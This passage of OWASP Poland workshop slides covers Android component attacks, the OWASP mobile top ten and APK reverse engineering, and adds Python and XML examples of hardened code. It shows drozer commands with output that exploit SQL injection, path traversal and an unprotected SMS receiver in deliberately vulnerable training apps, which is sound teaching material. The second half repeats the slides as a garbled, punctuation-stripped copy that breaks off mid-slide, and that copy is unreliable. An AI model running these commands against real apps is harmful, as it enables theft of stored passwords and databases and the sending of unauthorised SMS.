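    selection is a fixed template whose values are bound as parameters."""
    for column in projection:
        if column not in ALLOWED_COLUMNS:
            raise ValueError(f"column not exposed by this provider: {column!r}")
    if selection not in ALLOWED_SELECTIONS:
        raise ValueError(f"selection not allowed: {selection!r}")
    sql = f"SELECT {', '.join(projection)} FROM Passwords"
    if selection:
        sql += f" WHERE {selection}"
    return _open_db().execute(sql, selection_args).fetchall()


def hardened_probe(projection: list, selection: str, selection_args: list):
    """Same reporting wrapper for the hardened provider."""
    try:
        return "rows", hardened_query(projection, selection, selection_args)
    except ValueError as exc:
        return "rejected", str(exc)
```

probe("*", "'") reproduces the "unrecognized token" error from the --selection slide, and probe("* FROM Key--", "1=1") reproduces the --projection slide: the comment marker swallows the rest of the statement, so the Key table comes back instead of Passwords. The hardened variant refuses both before any SQL is built; a bound value such as "' OR 1=1--" is just a string that matches no service.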
Content providers attacks
• Path traversal
One interesting real-life example: http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application/
dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
127.0.0.1 localhost
dz> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db /home/user/database.db
Written 24576 bytes
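The two reads above succeed because Sieve's FileBackupProvider opens whatever path the URI carries. As an added example (not Sieve's code and not from the workshop), a Python stand-in for that openFile() logic next to a version that confines the path to a backup directory; the directory layout is constructed in a temporary folder and the file names are made up.

```python
import os
import tempfile


def vulnerable_resolve(uri_path: str) -> str:
    """Mirror of an openFile() that does new File(uri.getPath()): the URI path
    is used as-is, so /etc/hosts or /data/data/<pkg>/databases/x.db are valid
    targets for any app that can reach the provider."""
    return uri_path


def hardened_resolve(backup_dir: str, uri_path: str) -> str:
    """Confine the request to backup_dir: strip leading slashes, collapse '..'
    and symlinks with realpath, then require the result to stay under the root.
    This is the File.getCanonicalPath() + startsWith() check a provider should
    do before handing out a ParcelFileDescriptor."""
    root = os.path.realpath(backup_dir)
    candidate = os.path.realpath(os.path.join(root, uri_path.lstrip("/")))
    if os.path.commonpath([root, candidate]) != root:
        raise PermissionError(f"path escapes backup directory: {uri_path!r}")
    return candidate


def is_blocked(backup_dir: str, uri_path: str) -> bool:
    """True when hardened_resolve refuses the path."""
    try:
        hardened_resolve(backup_dir, uri_path)
        return False
    except PermissionError:
        return True


def demo() -> dict:
    """Constructed layout: <tmp>/backup/notes.txt is the only file the provider
    should serve; <tmp>/database.db stands in for the app's private database."""
    with tempfile.TemporaryDirectory() as tmp:
        backup = os.path.join(tmp, "backup")
        os.mkdir(backup)
        with open(os.path.join(backup, "notes.txt"), "w") as fh:
            fh.write("user notes")
        with open(os.path.join(tmp, "database.db"), "w") as fh:
            fh.write("SECRET ROWS")

        results = {}
        # Vulnerable: the caller names the database directly and gets it.
        with open(vulnerable_resolve(os.path.join(tmp, "database.db"))) as fh:
            results["vulnerable_escape"] = fh.read()
        # Hardened: the legitimate file is still served ...
        with open(hardened_resolve(backup, "/notes.txt")) as fh:
            results["hardened_inside"] = fh.read()
        # ... but every form of '..' escape is refused before a file is opened.
        results["hardened_traversal"] = is_blocked(backup, "../database.db")
        results["hardened_deep"] = is_blocked(backup, "a/b/../../../database.db")
        return results
```

Absolute paths such as /etc/hosts are not rejected outright; they are mapped under the backup root (where no such file exists), which keeps the provider's URI scheme working while removing the escape. Checking the canonical path, not the raw string, is what defeats symlinks and encoded dot segments.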
Content providers demo
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as "battery low", "boot completed", "headset plugged in", etc. Though most broadcasts originate from the system, applications can also send broadcasts.
Broadcast receivers
• If a receiver accepts broadcasts from untrusted sources, the app is at risk
Broadcast receivers attacks
Typical fail: missing authorization
• Enumerate receivers
• Determine how the receiver handles the action
• Send the intent and enjoy
Broadcast receivers attacks
Sample manifest from GoatDroid:
<receiver android:name=".broadcastreceivers.SendSMSNowReceiver" android:label="Send SMS">
    <intent-filter>
        <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
    </intent-filter>
</receiver>
…
<uses-permission android:name="android.permission.SEND_SMS" />
Broadcast receivers attacks
The following is the code that determines how the receiver handles the org.owasp.goatdroid.fourgoats.SOCIAL_SMS action:
public void onReceive(Context arg0, Intent arg1) {
    context = arg0;
    SmsManager sms = SmsManager.getDefault();
    Bundle bundle = arg1.getExtras();
    // phoneNumber and message come straight from the broadcast; nothing checks who sent it
    sms.sendTextMessage(bundle.getString("phoneNumber"), null, bundle.getString("message"), null, null);
    Utils.makeToast(context, Constants.TEXT_MESSAGE_SENT, Toast.LENGTH_LONG);
}
Broadcast receivers attacks
run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
General defenses for App Components
Applies to all of the above-mentioned components:
• Set the android:exported attribute to false (then only code running under the same user ID as the app can reach the component). A component that declares an intent-filter is exported by default unless you say otherwise; apps targeting Android 12 or later must set the attribute explicitly on such components
• Limit access with a permission on the component: a custom permission (ideally with protectionLevel="signature") or a system one such as RECEIVE_SMS where it fits
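The GoatDroid receiver from the attack slides with the two defenses applied, as an added example (not from the workshop or the GoatDroid project): the original exported declaration, a non-exported variant, and a variant guarded by a signature-level custom permission. The permission name is made up for the example.

```xml
<!-- As declared in GoatDroid: an intent-filter with neither android:exported
     nor android:permission leaves the receiver exported, so any app can trigger an SMS -->
<receiver android:name=".broadcastreceivers.SendSMSNowReceiver"
          android:label="Send SMS">
    <intent-filter>
        <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
    </intent-filter>
</receiver>

<!-- Option 1: only the app itself (same UID) can reach the receiver; the filter
     can stay if the app addresses it with an implicit intent from inside -->
<receiver android:name=".broadcastreceivers.SendSMSNowReceiver"
          android:label="Send SMS"
          android:exported="false">
    <intent-filter>
        <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
    </intent-filter>
</receiver>

<!-- Option 2: stays exported, but only apps signed with the same key as this one
     can hold the permission (protectionLevel="signature"); permission name is hypothetical -->
<permission android:name="org.owasp.goatdroid.fourgoats.permission.SEND_SOCIAL_SMS"
            android:protectionLevel="signature" />
<receiver android:name=".broadcastreceivers.SendSMSNowReceiver"
          android:label="Send SMS"
          android:exported="true"
          android:permission="org.owasp.goatdroid.fourgoats.permission.SEND_SOCIAL_SMS">
    <intent-filter>
        <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
    </intent-filter>
</receiver>
```

With either variant installed, re-run the app.broadcast.send command from the slide: the drozer agent runs under a different UID and is not signed with the app's key, so the broadcast is not delivered and logcat shows a permission denial instead of the "message sent" toast.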
References
• http://developer.android.com/guide/components/index.html
• http://developer.android.com/guide/topics/manifest/manifest-intro.html
• http://resources.infosecinstitute.com/android-hacking-security-part-1-exploiting-securing-application-components/
• http://resources.infosecinstitute.com/android-hacking-security-part-2-content-provider-leakage/
• http://resources.infosecinstitute.com/android-hacking-security-part-3-exploiting-broadcast-receivers/
• http://yinzhicao.org/courses/f15/cse343443/slides/mobilesecurity.pdf
• https://www.safaribooksonline.com/library/view/android-security-cookbook/
• https://www.mwrinfosecurity.com/system/assets/937/original/mwri_drozer-user-guide_2015-03-23.pdf
• https://manifestsecurity.com/android-application-security-part-5/
• https://manifestsecurity.com/android-application-security-part-8/
• https://www.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf
• http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application/
• https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet#android-application-penetration-testing
Thank you
• For additional questions, or just to stay in touch: c0rdis
OWASP top 10 mobile risks
Pawel Rzepa, OWASP Poland, 24.02.2016
Important notes
• The goal of this presentation is to give you basic knowledge about mobile risks and an easy methodology to find those risks in your applications
• If you want to add anything important/interesting and related to the topic – feel free to interrupt me :)
What are we going to talk about…
Before we start… the threat model
M2 - Insecure data storage
Insecure data storage – what it is
• Simple-words definition: valuable pieces of data (e.g. passwords, cookies, personal information) are stored in data stores on the device in an insecure format (plain text or a reversible encoding)
Insecure data storage – what to look for
• Look for any sensitive information in:
  – SQLite databases (local)
  – XML data stores (shared preferences)
  – Plain-text configuration files
  – Cookie stores
  – SD card
Insecure data storage – how to find
• Install and run the application for some time
• Monitor changes on the SD card before and after installing (and using) the application
• Analyze the package files at different stages:
  adb pull /data/data/<apk_package_name>
  (on a non-rooted device the app's private directory is not readable by adb; use a rooted device or an emulator, or run-as <package> when the app is debuggable)
Insecure data storage - demo
Insecure data storage – real example
• Outlook stored all attachments as unencrypted, world-readable files on external storage
Insecure data storage - mitigations
• Don't store data unless it's absolutely necessary
• Use encryption for local storage (note that DevicePolicyManager.setStorageEncryption only lets a device admin request device-level encryption; application data still has to be encrypted by the app itself)
• For databases consider using SQLCipher for SQLite data encryption
• Ensure any shared preferences are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection – what it is
• Simple-words definition: the application does NOT implement TLS, or implements it incorrectly
What do you mean "incorrectly"?
• Insecure implementations are:
  – Using known weak protocol versions or ciphers (e.g. SSLv2/SSLv3, RC4)
  – Securing only part of the communication (e.g. only authentication)
  – Lack of certificate inspection
Certificate inspection in web applications – chain of trust
• In web applications the validation of the certificate is done on the browser side
• It is done by a "chain of trust"
• But how can a mobile app know it is communicating with the proper server?
Cert pinning - theory
• The expected X.509 certificate or public key is embedded in the source code:
  if (presented_cert == pinned_cert)
      start_connection();
  else
      drop_connection();
  (pinning complements, rather than replaces, normal chain and hostname validation; pinning the public key or its SPKI hash instead of the whole certificate survives certificate renewal, and a backup pin avoids locking your own users out)
Cert pinning - reality
• Guys from Leibniz Universität Hannover tested 100 apps and…
• 21 apps trust all certificates
• 20 apps accept all hostnames
• And in the end they asked the developers why it happened…
More: https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
Insufficient transport layer protection - how to find
• Passive analysis with Wireshark/Burp (to check that all traffic is encrypted)
• Use Mallodroid:
  mallodroid.py -f AppToCheck.apk -d javaout
• Look for endpoint implementation flaws using SSLyze (or https://www.ssllabs.com/ssltest/ for a public domain):
  sslyze --regular www.example.com:443
Insufficient transport layer protection - example
Insufficient transport layer protection - few facts from reality
• According to the FireEye research from July 17, 2014, among the 1000 most-downloaded free applications in the Google Play store…
Source: https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html
Insufficient transport layer protection - mitigations
• Any sensitive data MUST be transferred over TLS
• How to do it properly? Follow the rules: https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage – what it is
• Simple-words definition: the OS/frameworks put sensitive information in an insecure location on the device
• Important note: insecure data storage is about the developer's conscious decision to store data in an insecure manner, while unintended data leakage refers to OS/framework-specific quirks which can cause data leakage
Unintended data leakage – common leakage points
• URL caching
• Copy/paste buffer caching
• Logging
• Analytics data sent to 3rd parties (e.g. ads sending the GPS location)
Unintended data leakage – how to find
• Extract data from leaking content providers using Drozer:
  dz> run app.provider.finduri <package_name>
• Use logcat to verify what is being logged:
  adb logcat [output filter]
• Use a listener (Burp/Wireshark) to monitor what is being sent to 3rd parties
• Use Intent Sniffer to see if any confidential data is sent via Intents
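What "verify what is being logged" looks like once automated, as an added example (not from the workshop): a few constructed logcat lines in threadtime format, a parser for that format, and one pattern per leak class this section lists (credentials, bearer tokens, GPS coordinates, card numbers). The sample lines, tags and values are made up, and the pattern set is a starting point rather than a complete one.

```python
import re

# Constructed `adb logcat -v threadtime` output (no real device, made-up values).
SAMPLE_LOGCAT = """\
03-01 10:12:01.123  4321  4321 D LoginActivity: POST /api/login user=alice password=Sup3rSecret!
03-01 10:12:01.456  4321  4321 I OkHttp: Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJhbGljZSJ9.abc123
03-01 10:12:02.001  4321  4340 V Analytics: event=open lat=51.1079 lon=17.0385
03-01 10:12:02.200  4321  4321 D Cache: loaded 12 entries
03-01 10:12:03.010  4321  4321 E AndroidRuntime: java.lang.RuntimeException: card=4111111111111111 declined
"""

# threadtime format: date time pid tid level tag: message
LINE_RE = re.compile(
    r"^(?P<date>\S+)\s+(?P<time>\S+)\s+(?P<pid>\d+)\s+(?P<tid>\d+)\s+"
    r"(?P<level>[VDIWEF])\s+(?P<tag>[^:]+):\s(?P<msg>.*)$"
)

# One pattern per leak class; findings are reported in this order per line.
PATTERNS = [
    ("password", re.compile(r"(?i)\b(?:pass(?:word|wd)?|pwd)\s*[=:]\s*\S+")),
    ("bearer_token", re.compile(r"(?i)\bbearer\s+[A-Za-z0-9_\-.=]+")),
    ("gps", re.compile(r"\blat=-?\d+\.\d+\b.*\blon=-?\d+\.\d+\b")),
    ("pan", re.compile(r"\b\d{13,19}\b")),
]


def luhn_ok(digits: str) -> bool:
    """Luhn check so that arbitrary long numbers (ids, timestamps) are not
    reported as card numbers."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def parse_logcat(text: str) -> list:
    """Return one dict per parsable line; lines in another format are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            entries.append(m.groupdict())
    return entries


def find_leaks(text: str, pid: str = None) -> list:
    """Scan message bodies (only the app's own pid when given) and return
    findings as {'tag', 'category', 'match'} dicts."""
    findings = []
    for entry in parse_logcat(text):
        if pid is not None and entry["pid"] != pid:
            continue
        for category, pattern in PATTERNS:
            for m in pattern.finditer(entry["msg"]):
                if category == "pan" and not luhn_ok(m.group(0)):
                    continue
                findings.append({"tag": entry["tag"], "category": category,
                                 "match": m.group(0)})
    return findings
```

Feed it the output of adb logcat -v threadtime captured while exercising login, payment and location features; passing the app's pid narrows the scan to its own lines. Every hit is either something to remove from the code or something to strip from the crash reporter, since the last line is exactly the kind of exception text that ends up in third-party crash logs.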
Unintended data leakage - demo
Unintended data leakage - mitigations
• NEVER log any sensitive information (watch what you're storing in crash logs)
• Disable the copy/paste function for sensitive parts of the application
• Disable debugging (android:debuggable="false")
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication – what it is
• Simple-words definition: if you're able to bypass authentication and/or elevate your privileges, then… your app has poor authorization and/or authentication
Poor Authorization and Authentication – how to find
• Try to bypass authentication by starting exported activities directly using Drozer:
  dz> run app.activity.start --component <package_name> <component_name>
• Intercept traffic with Burp and modify parameters to log in as another user / see unauthorized content (e.g. by manipulating the device ID)
• Test the account lockout policy
• Test the password strength policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication – real example
• A flaw in an application can become an entry point to compromise the operating system
• For example, the Viber app: https://www.youtube.com/watch?time_continue=40&v=rScheIQDD0k
And always remember to…
• …stay reasonable when you're going to follow advice from the Internet…
Poor Authorization and Authentication - mitigations
• Assume that client-side authorization and authentication controls can be bypassed; they must be enforced on the server side whenever possible
• Persistent authentication ("Remember Me") functionality implemented within mobile applications should never store the user's password on the device. It should be optional and not enabled by default
M6 - Broken Cryptography
Broken Cryptography – what it is
• Simple-words definition: using an insecure implementation, or using a sound one in an insecure way
• A few reminders (yeah, I know you know it…)
  – encoding ≠ encryption
  – obfuscation ≠ encryption
Broken Cryptography – how to find
• Decompile the apk using dex2jar and review the jar in JD-GUI (or Luyten for a more verbose result)
• Look for decryption keys (in an attacker-readable folder or hardcoded within the binary)
• Try to break the encryption algorithm if the application uses custom encryption
• Look for usage of insecure and/or deprecated algorithms (e.g. RC4, MD4/5, SHA1, etc.)
Broken Cryptography - example
• An encrypted db is definitely a good idea…
Broken Cryptography - example
• …but not when you're hardcoding the password used to decrypt it in the code…
Broken Cryptography – real example
• NQ Vault
Broken Cryptography - mitigations
• Use known strong cryptography implementations
• Do not hardcode keys/credentials/OAuth tokens
• Do not store keys on the device; use password-based encryption instead (a key derived from the user's password with a random salt and a slow KDF), or keep keys in the Android Keystore where the platform supports it
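The last mitigation in code, as an added example (not from the workshop or from NQ Vault): the hardcoded-key pattern that the "encrypted db" slides describe, next to password-based key derivation with PBKDF2-HMAC-SHA256 from the standard library, plus a verifier that lets the app check the password without ever storing the key. The key constant, salt size and iteration count are choices made for the example.

```python
import hashlib
import hmac
import os

# What the "encrypted db" example boils down to once the apk is decompiled:
# a constant anyone with dex2jar + JD-GUI can read (constructed value).
HARDCODED_DB_KEY = b"S3cr3tDbK3y!2016"

KEY_LEN = 32
SALT_LEN = 16
ITERATIONS = 100_000   # tune to roughly 100 ms on the slowest supported device


def key_from_hardcoded() -> bytes:
    """Every install and every attacker gets the same key."""
    return HARDCODED_DB_KEY


def derive_key(password: str, salt: bytes, iterations: int = ITERATIONS) -> bytes:
    """PBKDF2-HMAC-SHA256: the key exists only while the user has typed the
    password; nothing on disk lets an attacker recompute it without it."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt,
                               iterations, dklen=KEY_LEN)


def enroll(password: str) -> dict:
    """Record to persist: a fresh random salt plus a verifier derived from the
    key (HMAC over a fixed label), never the key or the password itself."""
    salt = os.urandom(SALT_LEN)
    key = derive_key(password, salt)
    verifier = hmac.new(key, b"db-key-verifier", hashlib.sha256).digest()
    return {"salt": salt, "iterations": ITERATIONS, "verifier": verifier}


def unlock(password: str, record: dict):
    """Return the database key for a correct password, None otherwise.
    hmac.compare_digest keeps the comparison constant-time."""
    key = derive_key(password, record["salt"], record["iterations"])
    verifier = hmac.new(key, b"db-key-verifier", hashlib.sha256).digest()
    if not hmac.compare_digest(verifier, record["verifier"]):
        return None
    return key
```

The returned key is what you would hand to SQLCipher as the database key. Storing the verifier rather than the key means an attacker who pulls the app's private directory still has to brute-force the password at PBKDF2 cost, which is the difference between the NQ Vault situation and a real protection.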
M7 - Client side injection
Client side injection – what it is
• Simple-words definition: malicious code can be provided as input and executed by the application (on the client side)
• The malicious code can come from:
  – Another application, via an intent/content provider
  – A shared file
  – The server response
  – A third-party website
Client side injection – what to inject
• SQL injection into a local db
• XSS/WebView injection
• Directory traversal
• Intent injection
A new Android toy – the Intents
• An Android application can talk (inter-process communication) to any other component (e.g. another application, a system service, a new activity, etc.) via special objects called Intents:
  Intent i = new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));
  Intent i = new Intent(android.provider.MediaStore.ACTION_IMAGE_CAPTURE);
Client side injection – how to find
• SQL injections:
  dz> run scanner.provider.injection -a <package_name>
• Data path traversal:
  dz> run scanner.provider.traversal -a <package_name>
• Intent injections:
  dz> run app.package.manifest <package_name>
  dz> run app.activity.info -a <package_name>
  dz> run app.service.info --permission null -a <package_name>
  dz> run intents.fuzzinozer --package_name <package_name> --fuzzing_intent
Client side injection – real example
• UniversalMDMClient (a built-in application of Samsung KNOX – a security feature to separate personal and professional activities)
• A crafted URI with the "smdm://" prefix allows remote installation of ANY application while the user thinks he's installing an update for UniversalMDMClient
• How it works in practice: https://www.youtube.com/watch?time_continue=56&v=6O9OBmsv-CM
Client side injection - mitigations
• Always validate any user input on the server side (and on the client before it reaches a WebView or the local database)
• For internal communication use only explicit Intents
• Avoid relying on intent-filters for internal communication: an implicit Intent your app sends can be matched by another application that declares the same filter, and the system then shows a chooser dialog (or delivers it to that app); setting android:exported="false" on your own activity does not prevent that
M9 - Improper session handling
Improper session handling – what it is
• Simple-words definition: if your session token can be guessed, retrieved by a third party, or never expires, then you have a problem
Improper session handling – how to find
• Intercept requests with a proxy (e.g. Burp) and:
  – Verify that the session expires (copy a cookie and try to use it after 30 minutes)
  – Verify that the session is destroyed after the authentication state changes (e.g. switching from one logged-in user to another logged-in user)
  – Verify whether you are able to guess any other session (e.g. it's easy to impersonate another user when the application uses the device ID as a session token)
Improper session handling – a few facts from reality
• What we know is that "sessions have to expire"…
• …but how long should one REALLY last?
• According to an experiment, the average application session (counted from opening an app to closing it) lasts… 71.56 seconds
  – http://www.mendeley.com/research/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage/
Improper session handling - mitigations
• Invalidate the session on the server side
• Set a session expiration time adjusted to your application
• Destroy all unused session tokens
• Use only high-entropy, tested token-generation sources
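The four mitigations above as server-side logic, added here as an example (not from the workshop): a session store that issues high-entropy tokens from the OS CSPRNG, keeps only a hash of each token, enforces idle and absolute expiry, and destroys the previous session whenever the authentication state changes. The timeouts are illustrative and the clock is injectable so the behaviour can be checked without waiting.

```python
import hashlib
import secrets
import time


class SessionStore:
    """Minimal server-side session table keyed by the SHA-256 of the token."""

    IDLE_TIMEOUT = 30 * 60           # seconds without a request before expiry
    ABSOLUTE_TIMEOUT = 12 * 60 * 60  # hard cap regardless of activity

    def __init__(self, clock=time.time):
        self._now = clock
        self._sessions = {}  # token hash -> {"user", "created", "last_seen"}

    @staticmethod
    def _key(token: str) -> str:
        # Store a digest so a leaked table does not hand out usable tokens.
        return hashlib.sha256(token.encode("utf-8")).hexdigest()

    def login(self, user_id: str, previous_token: str = None) -> str:
        """Authentication state changed: kill the old session (if any) and
        issue a fresh 256-bit random token, never something like a device ID."""
        if previous_token is not None:
            self.logout(previous_token)
        token = secrets.token_urlsafe(32)
        now = self._now()
        self._sessions[self._key(token)] = {"user": user_id, "created": now,
                                            "last_seen": now}
        return token

    def validate(self, token: str):
        """Return the user for a live session, or None (dropping the session)
        when it is unknown, idle-expired or past its absolute lifetime."""
        key = self._key(token)
        session = self._sessions.get(key)
        if session is None:
            return None
        now = self._now()
        if (now - session["last_seen"] > self.IDLE_TIMEOUT
                or now - session["created"] > self.ABSOLUTE_TIMEOUT):
            del self._sessions[key]
            return None
        session["last_seen"] = now
        return session["user"]

    def logout(self, token: str) -> None:
        """Explicit invalidation on the server side, not just on the client."""
        self._sessions.pop(self._key(token), None)

    def logout_everywhere(self, user_id: str) -> int:
        """Destroy every session of a user (password change, device lost)."""
        doomed = [k for k, s in self._sessions.items() if s["user"] == user_id]
        for k in doomed:
            del self._sessions[k]
        return len(doomed)
```

A device ID fails every property this class provides: it is not secret, not random, never rotates and never expires. The 71.56-second average session from the study above is an argument for short idle timeouts; the absolute timeout is what limits the damage when a token is copied out of a proxy log.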
Thank you
pawelrzepa@outlook.com
References
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks
• https://github.com/ikust/hello-pinnedcerts
• http://www.exploresecurity.com/testing-for-cipher-suite-preference/
• http://resources.infosecinstitute.com/android-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakage/
• http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks
• https://manifestsecurity.com/android-application-security/
• https://mobilesecuritywiki.com/
• http://androidcracking.blogspot.de/2014/02/zerdeis-luyten-worthwhile-jd-gui.html
• https://www.acsac.org/2011/openconf/modules/request.php?module=oc_program&action=view.php&a=&id=111&type=3&OPENCONF=54jm3hh7laelc19qq6ernql5m2
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Mobile_Threat_Model
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Security_Testing
• https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
• https://www.ssllabs.com/ssltest/
• http://www.slideshare.net/ibmsecurity/overtaking-firefox-profiles-vulnerabilities-in-firefox-for-android
• http://resources.infosecinstitute.com/cracking-nq-vault-step-by-step/
• http://www.slideshare.net/ibmsecurity/pinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystack
• https://github.com/linkedin/qark
• https://www.mendeley.com/catalog/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage/
• http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html
• http://www.bkav.com/top-news/-/view_content/content/46264/critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screen
• http://thehackernews.com/2014/05/microsoft-outlook-app-for-android.html
• https://drive.google.com/file/d/0BxOPagp1jPHWVnlzWGNVbFBMTW8/view?pref=2&pli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
